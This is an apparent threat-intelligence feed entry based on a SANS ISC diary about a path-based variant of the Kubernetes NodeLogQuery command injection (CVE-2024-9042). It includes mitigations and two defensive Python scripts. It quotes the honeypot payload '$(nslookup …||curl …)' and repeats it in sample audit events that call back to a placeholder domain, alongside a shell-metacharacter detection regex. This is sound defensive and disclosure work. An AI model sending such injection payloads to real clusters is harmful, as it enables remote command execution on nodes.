
Possible exploit variant for CVE-2024-9042 (Kubernetes OS Command Injection), (Wed, Dec 10th)

Medium
Exploit
Published: Wed Dec 10 2025 (12/10/2025, 15:25:08 UTC)
Source: SANS ISC Handlers Diary

Description

Last year, Kubernetes fixed a command injection vulnerability in the Kubernetes NodeLogQuery feature (CVE-2024-9042) [1]. To exploit the vulnerability, several conditions had to be met:

AI-Powered Analysis

Last updated: 12/10/2025, 15:30:35 UTC

Technical Analysis

The threat concerns a possible new exploit variant of CVE-2024-9042, an OS command injection vulnerability in the Kubernetes NodeLogQuery feature. Disclosed and patched in early 2025, the bug let an attacker execute arbitrary OS commands on Windows nodes by sending a crafted request to the node's logs endpoint, which is reached through the API server's node proxy (/api/v1/nodes/<node>/proxy/logs/). Three conditions had to hold: the node runs Windows, the NodeLogQuery feature gate is enabled on the kubelet (the feature was beta and off by default), and the caller is authorized to make nodes/proxy requests against the API server. The original exploit carried the OS command in the query string, i.e. in the GET parameters of the logs request.

Recently, the SANS ISC handlers observed honeypot requests that reuse the command injection idea but place the payload in a URL path segment rather than in the query string, in the form GET /$(nslookup -q=cname [domain]||curl [domain])/logs/. The payload is a standard out-of-band callback: if the server ever interpolates the path into a shell, the $( ) substitution runs and the DNS lookup or HTTP request to the attacker's domain tells the sender that it worked. It is unclear whether this represents a new vulnerability or a variant of CVE-2024-9042; since the nslookup-or-curl callback is the shape generic injection scanners use, the requests may also be untargeted probing. Either way, a payload in the path is not caught by detection rules that only inspect query parameters. No confirmed exploitation in the wild has been reported, but the activity indicates active probing or early exploitation attempts.

The beta status and default-off state of NodeLogQuery limit how many clusters are exposed, and the nodes/proxy authorization requirement confines the attack to insiders or holders of compromised credentials. Once exploited, however, the flaw gives command execution on the node, with full cluster compromise or lateral movement as possible follow-ons. The variant underscores the need to monitor Kubernetes API traffic for injection syntax in both the path and the query string, and to patch known vulnerabilities promptly.
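The detection logic the analysis calls for, written here as an added example that is not part of the ISC diary or of the Kubernetes project: it reads kube-apiserver audit events (one JSON object per line), percent-decodes the path and the query string separately, and flags shell command-substitution and command-chaining syntax in either location, so the original query-parameter form and the path-segment variant are both reported. The audit lines, usernames, source address and the oast.example.invalid callback domain are constructed for the example; the same find_injection() check can be pointed at the request line of an ingress, WAF or kubelet access log.

```python
import json
import re
from urllib.parse import urlsplit, unquote

# Shell syntax that has no business in a Kubernetes request path or query string.
# $( ) and backticks are command substitution; ${ }, ||, &&, | and ; expand or chain
# commands if the value ever reaches a shell; CR/LF catches %0a-style line breaks.
# Alternation order matters: "||" must be tried before "|".
SHELL_INJECTION = re.compile(r"\$\(|\$\{|`|\|\||&&|\||;|[\r\n]")

# The NodeLogQuery endpoint is /logs/ on the kubelet, normally reached through the
# API server's node proxy (/api/v1/nodes/<node>/proxy/logs/). Matched on the decoded path.
LOGS_ENDPOINT = re.compile(r"(^|/)logs/?$")


def decode_uri(request_uri):
    """Split a requestURI into a percent-decoded (path, query) pair.

    Path and query are split before decoding so that an encoded '?' (%3F) inside a
    path segment cannot move payload bytes between the two parts and dodge a check
    that only inspects one of them."""
    parts = urlsplit(request_uri)
    return unquote(parts.path), unquote(parts.query)


def find_injection(request_uri):
    """Return [(location, token), ...] for shell syntax found in the path or the query."""
    path, query = decode_uri(request_uri)
    hits = []
    for location, text in (("path", path), ("query", query)):
        hits.extend((location, m.group(0)) for m in SHELL_INJECTION.finditer(text))
    return hits


def scan_audit_lines(lines):
    """Scan kube-apiserver audit events (JSON, one per line); return the suspicious ones."""
    findings = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # not an audit event; skip it rather than abort the scan
        uri = event.get("requestURI", "")
        hits = find_injection(uri)
        if not hits:
            continue
        path, _ = decode_uri(uri)
        findings.append({
            "auditID": event.get("auditID"),
            "user": event.get("user", {}).get("username"),
            "sourceIPs": event.get("sourceIPs", []),
            "requestURI": uri,
            "logs_endpoint": bool(LOGS_ENDPOINT.search(path)),
            "locations": sorted({loc for loc, _ in hits}),
            "tokens": [tok for _, tok in hits],
        })
    return findings


def _event(audit_id, user, uri):
    # Minimal constructed audit.k8s.io/v1 event; only the fields the scanner reads are set.
    return json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "auditID": audit_id,
        "stage": "ResponseComplete", "verb": "get", "user": {"username": user},
        "sourceIPs": ["203.0.113.10"], "requestURI": uri,
    })


# Constructed sample log, not real traffic. The OAST domain is a placeholder.
SAMPLE_AUDIT_LINES = [
    # legitimate NodeLogQuery request for the kubelet service log
    _event("a1", "ops-viewer", "/api/v1/nodes/win-node-1/proxy/logs/?query=kubelet"),
    # original CVE-2024-9042 shape: payload in the query string (percent-encoded)
    _event("a2", "ci-bot", "/api/v1/nodes/win-node-1/proxy/logs/"
           "?query=%24(nslookup%20-q%3Dcname%20oast.example.invalid)"),
    # the variant seen by the honeypot: payload in a path segment, no query string
    _event("a3", "system:anonymous",
           "/$(nslookup -q=cname oast.example.invalid||curl oast.example.invalid)/logs/"),
    # unrelated request that must not trigger
    _event("a4", "ops-viewer", "/api/v1/pods?limit=500"),
]

if __name__ == "__main__":
    for f in scan_audit_lines(SAMPLE_AUDIT_LINES):
        print(f"{f['auditID']} user={f['user']} logs_endpoint={f['logs_endpoint']} "
              f"in={','.join(f['locations'])} tokens={f['tokens']} uri={f['requestURI']}")
```

The metacharacter list is deliberately broad; if a legitimate client in your environment sends ";" or "|" in query values, tighten the regex rather than drop the path check, since the path is exactly where the new variant hides.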

Potential Impact

For European organizations the impact could be significant for any cluster that runs Windows nodes with NodeLogQuery enabled. Successful exploitation yields remote code execution on a node, from which an attacker can run arbitrary commands, move laterally within the enterprise network and potentially compromise the whole cluster, with data breaches, service disruption, operational downtime and reputational damage as consequences. The need for API access with nodes/proxy authorization narrows the threat to insiders or attackers who already hold a foothold, but it remains a serious escalation path. With Kubernetes widely adopted by European enterprises and public-sector bodies, sensitive government, financial and industrial systems could be affected. Because the variant carries its payload in the URL path, detection rules that only inspect query parameters may miss it, raising the risk of undetected exploitation. Overall, the threat could undermine the confidentiality, integrity and availability of Kubernetes-managed workloads and data.

Mitigation Recommendations

1. Update the kubelet on every cluster to a release that contains the fix for CVE-2024-9042. Windows nodes are the ones this bug reaches, but patch uniformly.
2. Disable NodeLogQuery unless it is genuinely needed, especially on Windows nodes: leave the NodeLogQuery feature gate and enableSystemLogQuery off in the kubelet configuration (both are off by default while the feature is beta).
3. Restrict access to the API server, and through it the node proxy, to trusted users and networks, with strong authentication and authorization.
4. Keep the nodes/proxy subresource (the route to the logs endpoint) out of all but the most essential RBAC roles; review the ClusterRoles and bindings that grant it.
5. Monitor API server audit logs and network traffic for command injection syntax ($( ), backticks, pipes, command separators) in both the query string and the URL path, not only in the query parameters.
6. Put a WAF or API gateway in front of externally reachable API endpoints that can detect and block injection attempts, including path-based payloads.
7. Audit and penetration-test Kubernetes API endpoints and node-level features regularly.
8. Brief DevOps and security teams on the path-based variant so that detection and response cover it.
9. Segment the network to isolate nodes and limit lateral movement after a compromise.
10. Run runtime security tooling that flags anomalous process execution on nodes, for instance the kubelet spawning a shell, nslookup or curl.
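The exposure check behind items 1 and 2 above, written here as an added example that is not from SANS ISC or the Kubernetes project: it combines the node list from `kubectl get nodes -o json` with each node's live kubelet configuration as returned by `kubectl get --raw /api/v1/nodes/<node>/proxy/configz`, and reports a node as exposed only when every precondition holds (Windows, unpatched kubelet, feature gate on, enableSystemLogQuery on). The sample node list and configz documents are constructed for the example, and the fixed-version table is an assumption taken from the Kubernetes advisory for CVE-2024-9042; confirm it against the advisory before acting on the output.

```python
import json

# Kubelet patch releases that shipped the CVE-2024-9042 fix, keyed by minor version
# (1.29.13, 1.30.9, 1.31.5, 1.32.1). Assumed from the Kubernetes advisory; verify it
# before relying on the result. Minors newer than 1.32 were released with the fix,
# minors older than 1.29 never received it.
FIXED_KUBELET_PATCH = {29: 13, 30: 9, 31: 5, 32: 1}


def parse_version(version):
    """'v1.31.4-eks-abc123' or 'v1.30.8+k3s1' -> (1, 31, 4) / (1, 30, 8); suffixes ignored."""
    core = version.lstrip("v").split("-", 1)[0].split("+", 1)[0]
    major, minor, patch = (int(x) for x in core.split(".")[:3])
    return major, minor, patch


def kubelet_is_fixed(version):
    major, minor, patch = parse_version(version)
    if major != 1:
        return major > 1
    if minor > max(FIXED_KUBELET_PATCH):
        return True
    if minor < min(FIXED_KUBELET_PATCH):
        return False
    return patch >= FIXED_KUBELET_PATCH[minor]


def assess_nodes(nodes_doc, configz_by_node):
    """Combine a NodeList with each node's kubelet /configz document.

    A node is exposed to CVE-2024-9042 only when all four hold: it runs Windows, its
    kubelet predates the fix, the NodeLogQuery feature gate is on, and
    enableSystemLogQuery is on. Unpatched Linux nodes are still reported as unpatched,
    since the kubelet is out of date even though this bug does not reach them."""
    report = []
    for node in nodes_doc.get("items", []):
        name = node["metadata"]["name"]
        info = node["status"]["nodeInfo"]
        cfg = configz_by_node.get(name, {}).get("kubeletconfig", {})
        gate_on = bool(cfg.get("featureGates", {}).get("NodeLogQuery", False))
        query_on = bool(cfg.get("enableSystemLogQuery", False))
        windows = info.get("operatingSystem", "").lower() == "windows"
        fixed = kubelet_is_fixed(info["kubeletVersion"])
        report.append({
            "node": name,
            "os": info.get("operatingSystem"),
            "kubelet": info["kubeletVersion"],
            "patched": fixed,
            "node_log_query_on": gate_on and query_on,
            "exposed": windows and not fixed and gate_on and query_on,
        })
    return report


def exposed_nodes(nodes_doc, configz_by_node):
    return [r["node"] for r in assess_nodes(nodes_doc, configz_by_node) if r["exposed"]]


def _node(name, os_name, version):
    # Only the NodeList fields the check reads are filled in.
    return {"metadata": {"name": name},
            "status": {"nodeInfo": {"operatingSystem": os_name, "kubeletVersion": version}}}


def _configz(gate, query):
    # Shape of the kubelet /configz response, trimmed to the two relevant settings.
    return {"kubeletconfig": {"featureGates": {"NodeLogQuery": gate},
                              "enableSystemLogQuery": query}}


# Constructed inputs standing in for the two kubectl calls.
SAMPLE_NODES = {"kind": "NodeList", "items": [
    _node("win-node-1", "windows", "v1.31.4"),   # Windows, unpatched, feature on -> exposed
    _node("win-node-2", "windows", "v1.31.5"),   # Windows, patched
    _node("win-node-3", "windows", "v1.30.8"),   # Windows, unpatched, feature off
    _node("linux-node-1", "linux", "v1.30.8"),   # Linux, unpatched, feature on
]}
SAMPLE_CONFIGZ = {
    "win-node-1": _configz(True, True),
    "win-node-2": _configz(True, True),
    "win-node-3": _configz(False, False),
    "linux-node-1": _configz(True, True),
}

if __name__ == "__main__":
    print(json.dumps(assess_nodes(SAMPLE_NODES, SAMPLE_CONFIGZ), indent=2))
```

Reading /configz itself needs nodes/proxy authorization, so run the check from an administrative identity and treat any other subject that can make the same call as in scope for item 4.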


Technical Details

Article Source
Source URL: https://isc.sans.edu/diary/rss/32554 (fetched 2025-12-10T15:30:18Z, 422 words)

Threat ID: 6939920a86adcdec9b0f4365

Added to database: 12/10/2025, 3:30:18 PM

Last enriched: 12/10/2025, 3:30:35 PM

Last updated: 12/11/2025, 7:08:54 AM

